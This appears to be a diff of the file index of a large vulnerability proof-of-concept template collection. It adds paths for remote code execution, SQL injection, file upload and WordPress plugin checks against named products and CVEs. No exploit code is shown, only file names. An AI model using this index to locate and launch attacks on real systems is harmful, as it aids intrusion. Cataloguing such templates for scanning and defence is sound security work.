@@ -121152,6 +121440,7 @@
 ./poc/remote_code_execution/friendstore-for-woocommerce-f6c40d91764a7040df004249061d5f1d.yaml
 ./poc/remote_code_execution/friendstore-for-woocommerce.yaml
 ./poc/remote_code_execution/fuzz-reflection-rce.yaml
+./poc/remote_code_execution/geodatasource-country-region-dropdown-a5f6ea64e6ade169785eed830efe7d5f.yaml
 ./poc/remote_code_execution/geoserver-rce-cve-2024-30641.yaml
 ./poc/remote_code_execution/geoserver_rce_exploit.yaml
 ./poc/remote_code_execution/gestpay-for-woocommerce-3e97556eeeeeda9a3c8865da4f61e8c3.yaml
@@ -121210,6 +121499,7 @@
 ./poc/remote_code_execution/h3c-imc-rce.yml
 ./poc/remote_code_execution/h3c_imc_rce.yaml
 ./poc/remote_code_execution/hadoop-unauth-rce.yaml
+./poc/remote_code_execution/hamlintek-ISS-7000-login_handler-rce.yaml
 ./poc/remote_code_execution/hanta-rce.yaml
 ./poc/remote_code_execution/hashicorp-consul-rce-7890.yaml
 ./poc/remote_code_execution/hashicorp-consul-rce-7891.yaml
@@ -121345,6 +121635,7 @@
 ./poc/remote_code_execution/kingdee_apusic_loadtree_rce.yaml
 ./poc/remote_code_execution/kingdee_devreportservice_rce.yaml
 ./poc/remote_code_execution/kingdee_dynamicform_rce.yaml
+./poc/remote_code_execution/kingdee_eas_apputil_rce.yaml
 ./poc/remote_code_execution/kingdee_getbusinessobjectdata_rce.yaml
 ./poc/remote_code_execution/kingdee_k3_cloud_kdsvc_rce.yaml
 ./poc/remote_code_execution/kingdee_k3_cloud_saveuserassport_rce.yaml
@@ -121460,6 +121751,7 @@
 ./poc/remote_code_execution/mcafee-epo-rce.yaml
 ./poc/remote_code_execution/mediaburst-ecommerce-sms-notifications-6e9ad46ba7b82908596d92a906a7c328.yaml
 ./poc/remote_code_execution/mediaburst-ecommerce-sms-notifications.yaml
+./poc/remote_code_execution/meite-crm-sync_emp_weixin-rce.yaml
 ./poc/remote_code_execution/membership-for-woocommerce-a840ced418f0a4427fd2be21dafcbb52.yaml
 ./poc/remote_code_execution/membership-for-woocommerce.yaml
 ./poc/remote_code_execution/metersphere-plugin-rce-8835.yaml
@@ -121473,6 +121765,7 @@
 ./poc/remote_code_execution/min-and-max-purchase-for-woocommerce-29c59921f159dd1fd640d027a39c2496.yaml
 ./poc/remote_code_execution/min-and-max-purchase-for-woocommerce.yaml
 ./poc/remote_code_execution/min-and-max-quantity-for-woocommerce-0f5a6c102396442ad361086f6c37c680.yaml
+./poc/remote_code_execution/min-and-max-quantity-for-woocommerce.yaml
 ./poc/remote_code_execution/mingyu_rce.yaml
 ./poc/remote_code_execution/minimum-purchase-for-woocommerce-e4f1cc5bd593337093a7edcab950e56f.yaml
 ./poc/remote_code_execution/minimum-purchase-for-woocommerce.yaml
@@ -121580,6 +121873,7 @@
 ./poc/remote_code_execution/ni-woocommerce-custom-order-status-c82f3bfb0227cd93471796cd6ad7019e.yaml
 ./poc/remote_code_execution/ni-woocommerce-custom-order-status.yaml
 ./poc/remote_code_execution/ni-woocommerce-order-export-bc1c0fd81e2a3ec59a3d7bcd78b83be3.yaml
+./poc/remote_code_execution/ni-woocommerce-order-export.yaml
 ./poc/remote_code_execution/ni-woocommerce-sales-report-8a31f44eb6f99b33cb133332f49866d6.yaml
 ./poc/remote_code_execution/ni-woocommerce-sales-report.yaml
 ./poc/remote_code_execution/no-captcha-recaptcha-for-woocommerce-01246388934c238995ce6993f2a170ff.yaml
@@ -121883,6 +122177,7 @@
 ./poc/remote_code_execution/printful-shipping-for-woocommerce.yaml
 ./poc/remote_code_execution/prodigy-commerce-89dae14b2ed2d25b5a5c7aae20575f1c.yaml
 ./poc/remote_code_execution/prodigy-commerce-a1ce3c50005a1cffbe6e7d120f43b0db.yaml
+./poc/remote_code_execution/prodigy-commerce.yaml
 ./poc/remote_code_execution/product-carousel-slider-for-woocommerce-75e47a5ed4787943ce44f39bf636a74e.yaml
 ./poc/remote_code_execution/product-carousel-slider-for-woocommerce.yaml
 ./poc/remote_code_execution/product-code-for-woocommerce-5ee4216503e0a22cb26fb4c72e6a4204.yaml
@@ -122437,6 +122732,7 @@
 ./poc/remote_code_execution/ti-woocommerce-wishlist-premium-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/remote_code_execution/ti-woocommerce-wishlist-premium.yaml
 ./poc/remote_code_execution/ti-woocommerce-wishlist.yaml
+./poc/remote_code_execution/tianrongxin-yunweishenji-synRequest-rce.yaml
 ./poc/remote_code_execution/titannit-web-rce.yaml
 ./poc/remote_code_execution/tm-woocommerce-compare-wishlist-c35cca44826bf131ddd624bb4037c9ba.yaml
 ./poc/remote_code_execution/tm-woocommerce-compare-wishlist.yaml
@@ -122564,6 +122860,7 @@
 ./poc/remote_code_execution/webappick-product-feed-for-woocommerce-ef466bbf7b36c7f4169533ec1161bc46.yaml
 ./poc/remote_code_execution/webappick-product-feed-for-woocommerce.yaml
 ./poc/remote_code_execution/webd-woocommerce-product-excel-importer-bulk-edit-ca4c619b208bcba2a3262a03cfacdba5.yaml
+./poc/remote_code_execution/webd-woocommerce-product-excel-importer-bulk-edit.yaml
 ./poc/remote_code_execution/webmin-cve-2019-15107-rce.yaml
 ./poc/remote_code_execution/webmin-cve-2019-15107-rce.yml
 ./poc/remote_code_execution/webpack-sourcemap-disclosure.yaml
@@ -123083,6 +123380,7 @@
 ./poc/remote_code_execution/woocommerce-multiple-free-gift-939e3a08a9f8b49368755587a40c875e.yaml
 ./poc/remote_code_execution/woocommerce-multiple-free-gift.yaml
 ./poc/remote_code_execution/woocommerce-myparcel-19ad14ddf207ea295ff49c75f6ba3023.yaml
+./poc/remote_code_execution/woocommerce-myparcel.yaml
 ./poc/remote_code_execution/woocommerce-ninjaforms-product-addons-fe7479a6b6025e86397ca09e26459aa3.yaml
 ./poc/remote_code_execution/woocommerce-ninjaforms-product-addons.yaml
 ./poc/remote_code_execution/woocommerce-one-page-checkout-0fb2ac203a6e2b270723afe1dd3e678a.yaml
@@ -124379,6 +124677,8 @@
 ./poc/search/manage-engine-ad-search-8733.yaml
 ./poc/search/manage-engine-ad-search.yaml
 ./poc/search/meilisearch-detect.yaml
+./poc/search/my-idx-home-search-19b216f4cb81ff6b86947c3420c19a79.yaml
+./poc/search/my-idx-home-search-cb1ebc1aa3b7aa8c2bfe19c90a10af1b.yaml
 ./poc/search/posts-search-b718660b00038c4eaa678ffe6a2a2cca.yaml
 ./poc/search/posts-search.yaml
 ./poc/search/predictive-search-0cf50064291ac9de617b4097519a9b8d.yaml
@@ -127420,6 +127720,7 @@
 ./poc/sql/CVE-2024-11008-db2446809c807d08d31f51bc0a794536.yaml
 ./poc/sql/CVE-2024-11010-7519a29fa5d8193b924c132cd64d9dbf.yaml
 ./poc/sql/CVE-2024-11088-564fc5eaafcf306cc1db90950bcd86ec.yaml
+./poc/sql/CVE-2024-11095-b0165142a699db32c27db406fb189dac.yaml
 ./poc/sql/CVE-2024-11119-91fb399971cf3dbe2eb559f4abe09be9.yaml
 ./poc/sql/CVE-2024-11178-1d03d4b0d9125cf395a9b36a817c53db.yaml
 ./poc/sql/CVE-2024-1118-d2488e79cdb18e5fa6f4b114e5fd1973.yaml
@@ -127454,7 +127755,11 @@
 ./poc/sql/CVE-2024-11754-f1c9edc69abf1d1c2adb003324039811.yaml
 ./poc/sql/CVE-2024-11809-f088a4ea2afc64dbeeb9c239f0dd835c.yaml
 ./poc/sql/CVE-2024-11823-96487c8862c6208dac1f43cc4dba71e2.yaml
+./poc/sql/CVE-2024-11855-c68a0514b5572dba40197a1e12cc708d.yaml
+./poc/sql/CVE-2024-11867-3bf808c90c9dd0a57945a67a217dbe53.yaml
 ./poc/sql/CVE-2024-11868-73a881cdb32507d918f8143682e8cdbd.yaml
+./poc/sql/CVE-2024-11869-50ed005605a356d0d3b23edb855715d9.yaml
+./poc/sql/CVE-2024-11883-4e04efa11f08a8fa78ba4ddbbc4a6849.yaml
 ./poc/sql/CVE-2024-11904-5fe3b58edbf68a55952920a93fb3f296.yaml
 ./poc/sql/CVE-2024-1209-262fb41bb4526e178dfcbc92b07bdb7c.yaml
 ./poc/sql/CVE-2024-12128-5b31f632a2dbc3187253dd9153d43eba.yaml
@@ -128245,6 +128550,7 @@
 ./poc/sql/CVE-2024-9652-44db9961d333aa8937876e8e157f625b.yaml
 ./poc/sql/CVE-2024-9686-0cacdb2f49f04713e2869267a33b0516.yaml
 ./poc/sql/CVE-2024-9687-b374db15d58a163b3240b89c41715498.yaml
+./poc/sql/CVE-2024-9698-dbff952933f5639b29a1b80e2c7a52b6.yaml
 ./poc/sql/CVE-2024-9704-f21a430d525f14c5222622c2499dbc1f.yaml
 ./poc/sql/CVE-2024-9772-63449420292c2222e67d62f0c2db8bf3.yaml
 ./poc/sql/CVE-2024-9776-b87b3db31f1eda93892f1d85c0aa0846.yaml
@@ -128567,6 +128873,7 @@
 ./poc/sql/adblock-notify-by-bweb-09712df89f849ba85b08f5f0deb0865b.yaml
 ./poc/sql/adblock-notify-by-bweb.yaml
 ./poc/sql/adbuddy-adblocker-detection-3bb46498f1afb79669fda4714744548d.yaml
+./poc/sql/adbuddy-adblocker-detection.yaml
 ./poc/sql/add-actions-and-filters-2062b3d0152716b08dbb9bcc487575a6.yaml
 ./poc/sql/add-custom-body-class-73eea1ff1972b4ee61f8bbfdba1f9166.yaml
 ./poc/sql/add-custom-css-and-js-1aa54d0c3f88c0268db513e4b2afc065.yaml
@@ -129505,6 +129812,7 @@
 ./poc/sql/create-block-theme-729116a8e0864b43db4ff160d409fd56.yaml
 ./poc/sql/create-mysql-detection.yaml
 ./poc/sql/creative-mail-by-constant-contact-81dbf091f815d0879e7547f1f800a4fa.yaml
+./poc/sql/cricket-score-e44fdb3a4ce9acdbe0ece5ab8b5a4c4a.yaml
 ./poc/sql/crm-perks-forms-df948c9db2d7d0836b43af04517a2188.yaml
 ./poc/sql/crm2go-28d1263dea4b625d406cdbe195fe59b3.yaml
 ./poc/sql/crmeb-sqli.yaml
@@ -129569,6 +129877,7 @@
 ./poc/sql/customize-login-6bc72b71e8cd0dbddc9b60f508953d2e.yaml
 ./poc/sql/customize-login-image-604de254992d58db93ceab0ba09968f5.yaml
 ./poc/sql/cvms-sqli.yaml
+./poc/sql/cyberpanel-upgrademysqlstatus-rce.yaml
 ./poc/sql/cybersoldier-0d4e2476f7a9f0dba7d4566f0c76ba66.yaml
 ./poc/sql/cyclone-slider-9e821dbd0d443e94c28eb42e2a474a7e.yaml
 ./poc/sql/da-reactions-6477bf18cad6c823db485408d49b337b.yaml
@@ -130127,6 +130436,8 @@
 ./poc/sql/fangweicms-sqli.yaml
 ./poc/sql/fangweicms-sqli.yml
 ./poc/sql/fanruan-finereport-fr_dialog-sqli.yaml
+./poc/sql/fanwei-Ecology-LoginSSO-sqli.yaml
+./poc/sql/fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml
 ./poc/sql/fanwei-ebridge-addtaste-sqli.yaml
 ./poc/sql/fanwei-eweaver-showdocsimageservlet-sqli.yaml
 ./poc/sql/fanwei-upgrade-sqli.yaml
@@ -130619,6 +130930,7 @@
 ./poc/sql/import-users-from-csv-with-meta-5ae540e88cb1330d6b0edb80cb536c4f.yaml
 ./poc/sql/import-users-from-csv-with-meta-5efeb10bcd7116457ddb14cd2034038c.yaml
 ./poc/sql/import-users-from-csv-with-meta-8c3af6b78cdbf68a297b87232eecaf44.yaml
+./poc/sql/ims-countdown-afc1b693115a4259c31be875ae4878db.yaml
 ./poc/sql/inazo-advanced-ads-management-aa08fbd88edca8dbb4cd29426f2a4a55.yaml
 ./poc/sql/inbound-brew-6477bf18cad6c823db485408d49b337b.yaml
 ./poc/sql/indeed-membership-pro-9649320db97cb88ae1de28a12e634fc0.yaml
@@ -130695,6 +131007,7 @@
 ./poc/sql/jdbc-connection-string-8246.yaml
 ./poc/sql/jdbc-connection-string.yaml
 ./poc/sql/jds-portfolio-6477bf18cad6c823db485408d49b337b.yaml
+./poc/sql/jeecg-boot-getTotalData-sqli-CVE-2024-48307.yaml
 ./poc/sql/jeecg-boot-queryFieldBySql-sqli.yaml
 ./poc/sql/jeeng-push-notifications-b9d756b997db8ed19a92f52d10f55566.yaml
 ./poc/sql/jeg-elementor-kit-afcfb0a6aba99eda7112db6ba445be29.yaml
@@ -131112,6 +131425,7 @@
 ./poc/sql/move-addons-e750f1bb05d811fe0e3f213b39e81dbd.yaml
 ./poc/sql/moveto-154cdc35f396e8fc20508edb7d0555dc.yaml
 ./poc/sql/movie-database-b1e09ab8611ddb31d85cd0e793d89389.yaml
+./poc/sql/movie-database.yaml
 ./poc/sql/mp-timetable-c7a9ef628b1154c47dbf0b3fd366d29d.yaml
 ./poc/sql/mq-woocommerce-products-price-bulk-edit-1af1bfa2b2a7cb0a9db573b3931a0491.yaml
 ./poc/sql/mrkwp-footer-for-divi-6477bf18cad6c823db485408d49b337b.yaml
@@ -131659,6 +131973,7 @@
 ./poc/sql/qibocms-sqli.yml
 ./poc/sql/qilai-oa-sqli.yaml
 ./poc/sql/qilai-oa-sqli1.yaml
+./poc/sql/qiwang-ERP-drawGrid-sqli.yaml
 ./poc/sql/qiwang-erp-sql-comboxstore.yaml
 ./poc/sql/qode-instagram-widget-26f33f7442549dca3a8db4ead5773c3c.yaml
 ./poc/sql/qode-instagram-widget-a4d47fbcc8ba75eedb704bdd7cb00b46.yaml
@@ -132090,6 +132405,7 @@
 ./poc/sql/sina-extension-for-elementor-bc95d42bdd955507837edba15c594b62.yaml
 ./poc/sql/sina-extension-for-elementor-c628af513dbf63244f690c5fe520be33.yaml
 ./poc/sql/sintic_gallery-dba58849ff842fccc9f3a0395ea1bdf9.yaml
+./poc/sql/sip-calculator-03696418e2ddb2e57359bcf1347e1091.yaml
 ./poc/sql/sirv-50d73e2c252117d71be521471dbd6c70.yaml
 ./poc/sql/sis-handball-8cafe4e48984557c842cbe1e18cc78f0.yaml
 ./poc/sql/sis-handball-967c306912ff6641facb9ba5be13a1ee.yaml
@@ -133362,6 +133678,7 @@
 ./poc/sql/wp-job-manager-resumes-708c91d109621edb26b9c0651bc1fb89.yaml
 ./poc/sql/wp-job-openings-af2c35f9ce7ba3572d5127d1db8fe3a7.yaml
 ./poc/sql/wp-job-portal-01f968db5483a0b7e206fc18507075c8.yaml
+./poc/sql/wp-job-portal-dc870f31dbdd3ed85cf5c81a865becfd.yaml
 ./poc/sql/wp-jobsearch-12e7b7e870879cde0d048ddb78b1deff.yaml
 ./poc/sql/wp-jobsearch-2c4bdb5c3d4ea7464d5b6e88f1173a27.yaml
 ./poc/sql/wp-jobsearch-3003eb9d50d1efc6a58d35a1db2175a8.yaml
@@ -133709,6 +134026,7 @@
 ./poc/sql/yith-woocommerce-product-vendors-7089ab18627bdbdafbf32b0be13d15ce.yaml
 ./poc/sql/yith-woocommerce-tab-manager-e6e7cd74e4562bc2eadbce150a95c58e.yaml
 ./poc/sql/yith-woocommerce-wishlist-96db56825f3804eea351db0949dce178.yaml
+./poc/sql/ymc-states-map-696be7426132daf80e136f71893126db.yaml
 ./poc/sql/yml-for-yandex-market-6cfbcf5f28e11f92dbbaba64d8f47ad3.yaml
 ./poc/sql/yongyou-ICurrtype-sqli.yaml
 ./poc/sql/yongyou-KSOA-servletimagefield-sKeyvalue-sqli.yaml
@@ -133720,6 +134038,7 @@
 ./poc/sql/yongyou-ksoa-sql-servletimagefield.yaml
 ./poc/sql/yongyou-ksoa-sql-time-PayBill.yaml
 ./poc/sql/yongyou-ksoa-sql-time-TaskRequestServlet.yaml
+./poc/sql/yongyou-nc-process-sqli.yaml
 ./poc/sql/yongyou-u8-KeyWordDetailReportQuery-sql-Injection.yaml
 ./poc/sql/yongyou-u8-RegisterServlet-sql-Injection.yaml
 ./poc/sql/yongyou-u8-nc-bs-sm-login2-RegisterServlet-sql-Injection.yaml
@@ -133727,6 +134046,7 @@
 ./poc/sql/yongyou-u8-oa-sqli-11747.yaml
 ./poc/sql/yongyou-u8-oa-sqli.yaml
 ./poc/sql/yongyou-u8-oa-sqli.yml
+./poc/sql/yongyou-u8c-cloud-approveservlet-sqli.yaml
 ./poc/sql/yonyou-GRP-U8-SQL.yaml
 ./poc/sql/yonyou-KSOA-PayBill-SQL.yaml
 ./poc/sql/yonyou-KSOA-TaskRequestServlet-SQL.yaml
@@ -133811,6 +134131,7 @@ ./poc/sql/zerobounce-28a8db3cd0f1837cb2f766f6f0110c2d.yaml ./poc/sql/zerof-web-server-handleevent-sqli.yaml ./poc/sql/zhibang_erp_GetPersonalSealData_sqli.yaml +./poc/sql/zhilink-SRM-quickReceiptDetail-sqli.yaml ./poc/sql/zhixiang-oa-msglog-aspx-sql-inject.yaml ./poc/sql/zhixiang-oa-msglog-sqli.yaml ./poc/sql/zhixiangOA-msg.aspx-sql.yaml @@ -134178,6 +134499,7 @@ ./poc/sql_injection/csz-cms-multiple-blind-sql-injection.yaml ./poc/sql_injection/csz-cms-sqli.yaml ./poc/sql_injection/cvms-sqli.yaml +./poc/sql_injection/cyberpanel-upgrademysqlstatus-rce.yaml ./poc/sql_injection/dahua-WPMS-sqli.yaml ./poc/sql_injection/dahua-clientserver-sqli.yaml ./poc/sql_injection/dahua-searchJson-sqli.yaml @@ -134315,6 +134637,8 @@ ./poc/sql_injection/fangweicms-sqli.yaml ./poc/sql_injection/fangweicms-sqli.yml ./poc/sql_injection/fanruan-finereport-fr_dialog-sqli.yaml +./poc/sql_injection/fanwei-Ecology-LoginSSO-sqli.yaml +./poc/sql_injection/fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml ./poc/sql_injection/fanwei-ebridge-addtaste-sqli.yaml ./poc/sql_injection/fanwei-eweaver-showdocsimageservlet-sqli.yaml ./poc/sql_injection/fanwei-upgrade-sqli.yaml @@ -134382,6 +134706,7 @@ ./poc/sql_injection/indonasia-toko-cms-sql.yaml ./poc/sql_injection/ioffice-oa-sqli.yaml ./poc/sql_injection/isNotInTable-sqli.yaml +./poc/sql_injection/jeecg-boot-getTotalData-sqli-CVE-2024-48307.yaml ./poc/sql_injection/jeecg-boot-queryFieldBySql-sqli.yaml ./poc/sql_injection/jinhe-jc6-sqli.yaml ./poc/sql_injection/jinhe-oa-c6-generalxmlhttppage-sqli.yaml @@ -134544,6 +134869,7 @@ ./poc/sql_injection/qibocms-sqli.yml ./poc/sql_injection/qilai-oa-sqli.yaml ./poc/sql_injection/qilai-oa-sqli1.yaml +./poc/sql_injection/qiwang-ERP-drawGrid-sqli.yaml ./poc/sql_injection/qiwang-erp-sql-comboxstore.yaml ./poc/sql_injection/quick-cms-sqli.yaml ./poc/sql_injection/readymade-unilevel-sqli.yaml 
@@ -134816,6 +135142,7 @@ ./poc/sql_injection/yongyou-ksoa-sql-servletimagefield.yaml ./poc/sql_injection/yongyou-ksoa-sql-time-PayBill.yaml ./poc/sql_injection/yongyou-ksoa-sql-time-TaskRequestServlet.yaml +./poc/sql_injection/yongyou-nc-process-sqli.yaml ./poc/sql_injection/yongyou-u8-KeyWordDetailReportQuery-sql-Injection.yaml ./poc/sql_injection/yongyou-u8-RegisterServlet-sql-Injection.yaml ./poc/sql_injection/yongyou-u8-nc-bs-sm-login2-RegisterServlet-sql-Injection.yaml @@ -134823,6 +135150,7 @@ ./poc/sql_injection/yongyou-u8-oa-sqli-11747.yaml ./poc/sql_injection/yongyou-u8-oa-sqli.yaml ./poc/sql_injection/yongyou-u8-oa-sqli.yml +./poc/sql_injection/yongyou-u8c-cloud-approveservlet-sqli.yaml ./poc/sql_injection/yonyou-GRP-U8-SQL.yaml ./poc/sql_injection/yonyou-KSOA-PayBill-SQL.yaml ./poc/sql_injection/yonyou-KSOA-TaskRequestServlet-SQL.yaml @@ -134886,6 +135214,7 @@ ./poc/sql_injection/zero-spam-sqli.yaml ./poc/sql_injection/zerof-web-server-handleevent-sqli.yaml ./poc/sql_injection/zhibang_erp_GetPersonalSealData_sqli.yaml +./poc/sql_injection/zhilink-SRM-quickReceiptDetail-sqli.yaml ./poc/sql_injection/zhixiang-oa-msglog-aspx-sql-inject.yaml ./poc/sql_injection/zhixiang-oa-msglog-sqli.yaml ./poc/sql_injection/zhixiangOA-msg.aspx-sql.yaml @@ -135693,6 +136022,7 @@ ./poc/upload/E-office 任意文件上传-mobile_upload_save(CVE-2023-2523).yaml ./poc/upload/E-office-do_excel-FileUpload.yaml ./poc/upload/E-office10-Upload.yaml +./poc/upload/EKing-Base64Upload-fileupload.yaml ./poc/upload/Esafenet-CDG-upload-UploadFileFromClientServiceForClient.yaml ./poc/upload/File upload - Double extensions.yaml ./poc/upload/File upload - MIME type.yaml 
@@ -135762,6 +136092,7 @@ ./poc/upload/bocai-anyfile-upload.yaml ./poc/upload/change-uploaded-file-permissions-f2c9a39b10e325775f68bea24bea9c06.yaml ./poc/upload/change-uploaded-file-permissions.yaml +./poc/upload/chanjet-TPlus-FileUploadHandler-uploadfile.yaml ./poc/upload/chanjet-Tplus-upload-Upload.yaml ./poc/upload/chanjet-tplus-fileupload.yaml ./poc/upload/checkout-files-upload-woocommerce-a18625d490ed71d145a8925252bef46d.yaml @@ -135858,6 +136189,7 @@ ./poc/upload/file-upload-types-0ae0add1178211808ca9adb56c0020f3.yaml ./poc/upload/file-upload-types.yaml ./poc/upload/file-upload.yaml +./poc/upload/filestack-upload-eef332a3e9a940fc24b6a8b85a58d6b7.yaml ./poc/upload/fine-report-v9-file-upload.yaml ./poc/upload/flink-upload-rce.yaml ./poc/upload/fluid-accessible-uploader-45ba464412c6ae4b94e80349ccf8b660.yaml @@ -135879,6 +136211,7 @@ ./poc/upload/gravity-file-ajax-upload-free-c741afeba607d04a91c7ec20302b3dd6.yaml ./poc/upload/gravity-file-ajax-upload-free.yaml ./poc/upload/grp-u8-uploadfiledata-fileupload.yaml +./poc/upload/h3c-CAS-CVM-fd-uploadfile.yaml ./poc/upload/h3c-cvm-anyfile-upload.yaml ./poc/upload/h3c-selfservice-flexfileupload-fileupload.yaml ./poc/upload/h3c_campus_network_self_service_system_flexifileupload_arbitrary_file_upload.yaml @@ -135914,6 +136247,7 @@ ./poc/upload/images-optimize-and-upload-cf7.yaml ./poc/upload/increase-upload-file-size-maximum-execution-time-limit-d66f2cb0528cb877e17943517257d459.yaml ./poc/upload/increase-upload-file-size-maximum-execution-time-limit.yaml +./poc/upload/inspur-GS-UploadListFile-uploadfile.yaml ./poc/upload/ioffice_iorepsavexml_upload.yaml ./poc/upload/jan-file-upload.yaml ./poc/upload/jinhe-oa-c6-uploadfiledownloadnew-fileread.yaml 
@@ -135926,6 +136260,7 @@ ./poc/upload/jinher_OA_JC6_upload.yaml ./poc/upload/jinher_OA_uploadImagedownloadIn_fileread.yaml ./poc/upload/jinher_OA_uploaddoc_sqli.yaml +./poc/upload/jinhuadijia-weixinshangqiang-mobile-fileupload.yaml ./poc/upload/jquery-html5-file-upload-58c64f0190a188752c2bc31ea814e632.yaml ./poc/upload/jquery-html5-file-upload-99d97c3ef9ed363f511bf86081dfd920.yaml ./poc/upload/jquery-html5-file-upload-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -135984,6 +136319,7 @@ ./poc/upload/mainwp-file-uploader-extension-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/upload/mainwp-file-uploader-extension-plugin.yaml ./poc/upload/mainwp-file-uploader-extension.yaml +./poc/upload/meite-crm-upload-upload.yaml ./poc/upload/mingyuanyun-ERP-upload-ApiUpdate.yaml ./poc/upload/mingyuanyun-erp-apiupdate-ashx-fileupload.yaml ./poc/upload/n5-uploadform-275cc5187416715fb3f5d44f3820ae1a.yaml @@ -136030,6 +136366,7 @@ ./poc/upload/nmedia-user-file-uploader-plugin.yaml ./poc/upload/nmedia-user-file-uploader.yaml ./poc/upload/nsfocus-nf-bugsInfo-fileupload.yaml +./poc/upload/nuuo-upload-uploadfile.yaml ./poc/upload/oa-v9-uploads-file-9187.yaml ./poc/upload/oa-v9-uploads-file-9188.yaml ./poc/upload/oa-v9-uploads-file-9189.yaml @@ -136041,6 +136378,7 @@ ./poc/upload/pepro-bacs-receipt-upload-for-woocommerce.yaml ./poc/upload/pigcms-manage-admin-fileupload.yaml ./poc/upload/pikachu_upload.yaml +./poc/upload/poguanjia-erp-uploadimgnocheck-fileupload.yaml ./poc/upload/powercreator-arbitrary-file-upload.yaml ./poc/upload/powercreator-arbitrary-file-upload.yml ./poc/upload/prestashop-blocktestimonial-file-upload.yaml 
@@ -136371,9 +136709,11 @@ ./poc/upload/yongyou-nc-cloud-upload-jsinvoke.yaml ./poc/upload/yongyou-u8-crm-upload-getemaildata.yaml ./poc/upload/yongyou-u8-upload.yaml +./poc/upload/yongyou-u8c-esnserver-fileupload.yaml ./poc/upload/yongyou-upload.yaml ./poc/upload/yongyouU8_UploadRce.yaml ./poc/upload/yongyou_Servlet_upload.yaml +./poc/upload/yonyou-U8clouderp-upload-uploadfile.yaml ./poc/upload/yonyou-chanjet-tplus-file-upload.yaml ./poc/upload/yonyou-chanjet-tplus-setupaccount-fileupload.yaml ./poc/upload/yonyou-crm-arbitrary-file-upload.yaml @@ -136950,6 +137290,7 @@ ./poc/web/koala-web-server.yaml ./poc/web/kopano-webapp-panel.yaml ./poc/web/kubernetes-web-view.yaml +./poc/web/lanling-oa-hrstaffwebservice-fileread.yaml ./poc/web/lantronix-webmanager-panel.yaml ./poc/web/laravel-improper-webdir.yaml ./poc/web/laravel-improper-webdir.yml @@ -137401,6 +137742,7 @@ ./poc/web/webcomco-panel.yaml ./poc/web/webctrl.yaml ./poc/web/webd-woocommerce-product-excel-importer-bulk-edit-ca4c619b208bcba2a3262a03cfacdba5.yaml +./poc/web/webd-woocommerce-product-excel-importer-bulk-edit.yaml ./poc/web/webdav-enabled.yaml ./poc/web/webeditors-1.yaml ./poc/web/webeditors-11128.yaml @@ -138651,6 +138993,7 @@ ./poc/wordpress/i-dump-iphone-to-wordpress-photo-uploader-plugin.yaml ./poc/wordpress/i-dump-iphone-to-wordpress-photo-uploader.yaml ./poc/wordpress/indeed-wp-superbackup-617a1d8a65bee9cf7b98f71587d5bbf1.yaml +./poc/wordpress/indeed-wp-superbackup.yaml ./poc/wordpress/index-wp-mysql-for-speed-c0b7cb4b326a8416392c1d09bebe71d4.yaml ./poc/wordpress/index-wp-mysql-for-speed.yaml ./poc/wordpress/insert-or-embed-articulate-content-into-wordpress-0c31dccd0d7be9933fe1ceaf56d128f2.yaml 
@@ -138709,6 +139052,7 @@ ./poc/wordpress/jcwp-youtube-channel-embed-a759e03a3140ab5da9f810ffbdb3a4c2.yaml ./poc/wordpress/jcwp-youtube-channel-embed.yaml ./poc/wordpress/jlayer-parallax-slider-wp-8ff10f61dea7350124b039f1e92690b4.yaml +./poc/wordpress/jlayer-parallax-slider-wp.yaml ./poc/wordpress/jobboardwp-18cb9f5edb780153786e60f4b2af597d.yaml ./poc/wordpress/jobboardwp-27728a3ea145a3bf22ab8423f6c00ff1.yaml ./poc/wordpress/jobboardwp-3bb0ade095b811a07058e97785c9e18a.yaml @@ -138742,6 +139086,7 @@ ./poc/wordpress/jw-player-plugin-for-wordpress-plugin.yaml ./poc/wordpress/jw-player-plugin-for-wordpress.yaml ./poc/wordpress/jwp-a11y-83352b6551092dd47080d7d2a29a35ff.yaml +./poc/wordpress/jwp-a11y.yaml ./poc/wordpress/kindeditor-for-wordpress-510a76a7b2fa0cc170a5f4dce0d03e77.yaml ./poc/wordpress/kindeditor-for-wordpress-7292ad88bc93795269d617a71a5e6b3f.yaml ./poc/wordpress/kindeditor-for-wordpress-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -139277,6 +139622,7 @@ ./poc/wordpress/real-estate-listing-realtyna-wpl-f6a88f0b9b916f8e5f7f55275d656e2c.yaml ./poc/wordpress/real-estate-listing-realtyna-wpl.yaml ./poc/wordpress/real-wp-shop-lite-91a45dec7983fa3e47682bea55d7171d.yaml +./poc/wordpress/real-wp-shop-lite.yaml ./poc/wordpress/recipe-card-blocks-by-wpzoom-17b167f964b4e8d7b54a1ca26f157b21.yaml ./poc/wordpress/recipe-card-blocks-by-wpzoom-7f3f241cdb00c9c579dce45a1c4fe856.yaml ./poc/wordpress/recipe-card-blocks-by-wpzoom-b256a8105fe98b4a7604d20b05dc4d98.yaml 
@@ -139557,6 +139903,7 @@ ./poc/wordpress/users-customers-import-export-for-wp-woocommerce-e748f28389b4b9a3e19d21a7a9fd82a0.yaml ./poc/wordpress/users-customers-import-export-for-wp-woocommerce.yaml ./poc/wordpress/users-import-export-with-excel-for-wp-ca4c619b208bcba2a3262a03cfacdba5.yaml +./poc/wordpress/users-import-export-with-excel-for-wp.yaml ./poc/wordpress/userswp-03f9877dcc1ea93d2d2a37048e3c8a43.yaml ./poc/wordpress/userswp-47dc2afc2eabb2ac331321dc5ab91d71.yaml ./poc/wordpress/userswp-57207794c9d3e3d069ac2156d3c6a959.yaml @@ -140539,6 +140886,7 @@ ./poc/wordpress/wp-action-network-889d920d4ff6444a70f7a9e3a0f53da7.yaml ./poc/wordpress/wp-action-network.yaml ./poc/wordpress/wp-activate-register-redirect.yaml +./poc/wordpress/wp-ad-guru-bb28f01cd39849324f89e02e0f2950e5.yaml ./poc/wordpress/wp-ada-compliance-check-basic-dc14ecaf870d203b479bf0a5d6538958.yaml ./poc/wordpress/wp-ada-compliance-check-basic.yaml ./poc/wordpress/wp-adaptive-xss-11403.yaml @@ -140783,6 +141131,7 @@ ./poc/wordpress/wp-attest.yaml ./poc/wordpress/wp-auctions-89ead7db0eb36d917e5bca365b6051f0.yaml ./poc/wordpress/wp-auctions-a5ddf335d9c4a4d33be097e8c281afcc.yaml +./poc/wordpress/wp-auctions.yaml 